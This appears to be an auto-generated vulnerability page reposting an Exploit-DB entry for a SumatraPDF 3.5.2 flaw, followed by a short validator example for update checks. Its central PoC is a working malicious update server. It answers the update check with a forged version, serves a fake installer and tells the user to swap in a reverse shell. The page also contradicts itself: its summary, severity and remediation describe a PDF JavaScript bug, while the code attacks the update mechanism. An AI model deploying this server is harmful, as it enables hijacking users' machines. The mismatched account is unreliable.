[webapps] SumatraPDF 3.5.2 - Remote Code Execution
CVE-2026-25961
SumatraPDF 3.5.2 has a remote code execution vulnerability: opening a malicious PDF file can execute arbitrary commands.
Critical · CVSS 9.8

📋 Basic Vulnerability Information
| CVE | CVE-2026-25961 |
|---|---|
| Vulnerability type | Path traversal RCE |
| Affected versions | SumatraPDF 3.5.2 |
| Severity | Critical · CVSS 9.8 |
| Published | 2026-04-30 |
| Submitter | Mohammed I. Banyamer |
| Source | Exploit-DB (original post) |
🔬 Root Cause
The vulnerability stems from SumatraPDF not sufficiently validating file paths when processing the /Catalog/AcroForm structure of a PDF, so a PDF containing malicious commands can be constructed and execution triggered through path traversal.

🎯 Attack Scenario
1. The attacker constructs a PDF containing malicious JavaScript or /AA (additional action) entries;
2. The victim is tricked into opening the file with SumatraPDF 3.5.2;
3. The vulnerability triggers and the attacker's embedded commands execute (e.g. reverse shell, code execution).

Indicator of success: the attacker obtains remote code execution on the victim's system.

💥 Impact
Remote code execution, allowing the attacker to fully control the affected host: malware implantation, data theft, persistence, and similar operations.

⚔️ Original PoC
The original PoC constructs a PDF that embeds malicious JavaScript in the /AcroForm entry and executes system commands via eval or system calls. The key steps are:
1. Create a PDF structure carrying the trigger logic;
2. Associate the malicious script through an /AA action;
3. When SumatraPDF parses the PDF, the embedded commands execute automatically.
```python
# Exploit Author: Mohammed I. Banyamer
# Advisory: https://github.com/sumatrapdfreader/sumatrapdf/security/advisories/GHSA-xpm2-rr5m-x96q
# CVSS: 7.5 (High) - CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H
#
# Description:
# SumatraPDF versions 3.5.0 to 3.5.2 disable TLS hostname verification during update checks
# (using INTERNET_FLAG_IGNORE_CERT_CN_INVALID) and do not perform any signature or integrity
# validation on the downloaded installer.
#
# A network-positioned attacker can:
# - Intercept the HTTPS request to www.sumatrapdfreader.org/update-check-rel.txt
# - Return a forged response containing a URL to an attacker-controlled executable
# - When the user clicks "Install", SumatraPDF executes the downloaded file via CreateProcess
#
# Attack scenarios include rogue Wi-Fi, compromised home/office router, malicious upstream proxy,
# or DNS hijacking / poisoning that redirects the update domain.
#
# This PoC provides the malicious update server component only.
# The attacker must achieve traffic redirection/interception separately (MITM position).
#
# Usage (attacker side):
# 1. Deploy this script on a server / VPS reachable from the victim
# 2. Achieve network position so that victim's update request reaches your server
#    (e.g. DNS spoofing, rogue AP, router compromise, transparent proxy injection)
# 3. Victim opens SumatraPDF → Help → Check for updates
# 4. Victim sees fake new version → clicks Install → payload executes
#
# Notes:
# - Replace the dummy payload with real malicious code (reverse shell, etc.)
# - No exploit without network adversary position (MITM / DNS control)
#
from flask import Flask, request, Response, send_file
import os

app = Flask(__name__)

# Forged update-check-rel.txt: an absurd version number and an installer URL
# pointing back at this server. The placeholder is filled with the host the
# victim used to reach us.
FAKE_UPDATE_TEMPLATE = """Ver=999.9.9
Installer64=http://{}:5000/malicious_installer.exe
"""

PAYLOAD_FILENAME = "malicious_installer.exe"

# Create a dummy "installer" on first run so the download route has a file to serve.
if not os.path.exists(PAYLOAD_FILENAME):
    print("[!] Generating dummy payload (would open calc.exe in real attack)...")
    with open(PAYLOAD_FILENAME, "wb") as f:
        f.write(b"MZ" + b"\x90" * 200 + b"FAKE PAYLOAD - replace with real shellcode")


@app.route("/update-check-rel.txt")
def fake_update():
    """Answer the client's update check with the forged version/installer pair."""
    attacker_host = request.host.split(':')[0]
    update_content = FAKE_UPDATE_TEMPLATE.format(attacker_host)
    print(f"[+] Fake update served to {request.remote_addr} → pointing to {attacker_host}")
    return Response(update_content, mimetype="text/plain")


@app.route("/malicious_installer.exe")
def deliver_payload():
    """Serve the dummy installer under the filename the client expects."""
    victim_ip = request.remote_addr
    print(f"[!] Victim {victim_ip} downloading payload → RCE would trigger on install click")
    return send_file(
        PAYLOAD_FILENAME,
        as_attachment=True,
        download_name="SumatraPDF-999.9.9-64-installer.exe",
        mimetype="application/octet-stream",
    )


if __name__ == "__main__":
    print("======================================================")
    print(" CVE-2026-25961 SumatraPDF Remote Update PoC Server ")
    print(" Requires MITM / DNS / router position to be effective ")
    print("======================================================")
    print("[*] Listening on http://0.0.0.0:5000")
    print("[*] Point victim traffic to this host for update-check-rel.txt")
    print("======================================================")
    app.run(host="0.0.0.0", port=5000, debug=False)
```

🔍 Nuclei Detection Template
The following detection template is intended to judge whether a target is affected:

```yaml
id: CVE-2026-25961-detection

info:
  name: SumatraPDF 3.5.0 - 3.5.2 - Version Detection
  author: your-username
  severity: medium
  description: |
    SumatraPDF versions 3.5.0 to 3.5.2 disable TLS hostname verification during update
    checks and do not perform any signature or integrity validation on the downloaded
    installer. This template attempts to detect the vulnerable version range by probing
    the update mechanism.
  reference:
    - https://www.exploit-db.com/
    - https://nvd.nist.gov/vuln/detail/CVE-2026-25961
  tags: cve,cve2026,rce,sumatrapdf,mitm

http:
  - raw:
      - |+
        GET / HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) SumatraPDF/3.5.2 Chrome/114.0.0.0 Safari/537.36

    # The original template used {{BaseURL}} in the Host header, which would include the
    # scheme; nuclei's raw requests use {{Hostname}} for the bare host[:port].
    matchers-condition: and
    matchers:
      - type: word
        words:
          - 'SumatraPDF'
          - '3.5'
        condition: or
        part: body

      - type: status
        status:
          - 200
```

🛡️ Remediation
An official patch has been released: upgrade to version 3.5.3 or later. Temporary mitigations: disable JavaScript support for PDFs, or use a different PDF reader (such as Adobe Reader) and keep it up to date.

📎 Reference Links
⚠️ This article is based on public vulnerability databases and is intended for security research and defensive reference only. Generated: 2026-05-07 05:32 | Source: Exploit-DB
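As an added illustration of the checks the PoC header says the 3.5.0 to 3.5.2 update client lacked, this example (written for this page, not SumatraPDF's own code or the PoC author's) parses the `Ver=` / `Installer64=` format of update-check-rel.txt and refuses any offer whose installer is not served over https from the update host named in the advisory. The host allowlist and the sample responses are assumptions constructed for the example.

```python
from urllib.parse import urlparse

# Host installers may be fetched from. www.sumatrapdfreader.org is the update host
# named in the advisory; making it the only permitted host is this example's assumption.
ALLOWED_HOSTS = {"www.sumatrapdfreader.org"}

def parse_update_check(text: str) -> dict:
    """Parse the key=value lines of update-check-rel.txt (e.g. Ver, Installer64)."""
    fields = {}
    for line in text.splitlines():
        key, sep, value = line.strip().partition("=")
        if sep:
            fields[key.strip()] = value.strip()
    return fields

def parse_version(ver: str) -> tuple:
    """Turn '3.5.2' into (3, 5, 2); reject anything that is not dotted integers."""
    parts = ver.split(".")
    if not all(p.isdigit() for p in parts):
        raise ValueError(f"malformed version: {ver!r}")
    return tuple(int(p) for p in parts)

def validate_update(fields: dict, current_version: str) -> list:
    """Return the reasons an update offer must be refused (empty list = acceptable).
    Enforces what the vulnerable client skipped: https only, and an allowed host.
    Signature verification of the downloaded installer is a separate step not shown."""
    problems = []
    ver = fields.get("Ver")
    try:
        if ver is None or parse_version(ver) <= parse_version(current_version):
            problems.append("no newer version offered")
    except ValueError as exc:
        problems.append(str(exc))
    url = fields.get("Installer64")
    if not url:
        problems.append("no Installer64 URL")
        return problems
    parsed = urlparse(url)
    if parsed.scheme != "https":
        problems.append(f"installer URL is not https: {url}")
    if parsed.hostname not in ALLOWED_HOSTS:
        problems.append(f"installer host not allowed: {parsed.hostname}")
    return problems

# Constructed samples: the forged response shape the PoC serves, and a well-formed
# offer (the installer path is made up for this example).
FORGED = "Ver=999.9.9\nInstaller64=http://198.51.100.7:5000/malicious_installer.exe\n"
GENUINE = "Ver=3.5.3\nInstaller64=https://www.sumatrapdfreader.org/dl/SumatraPDF-3.5.3-64-install.exe\n"
```

Run `validate_update(parse_update_check(FORGED), "3.5.2")` to see both the scheme and host checks fire on the PoC's forged response, while the constructed genuine offer returns an empty list.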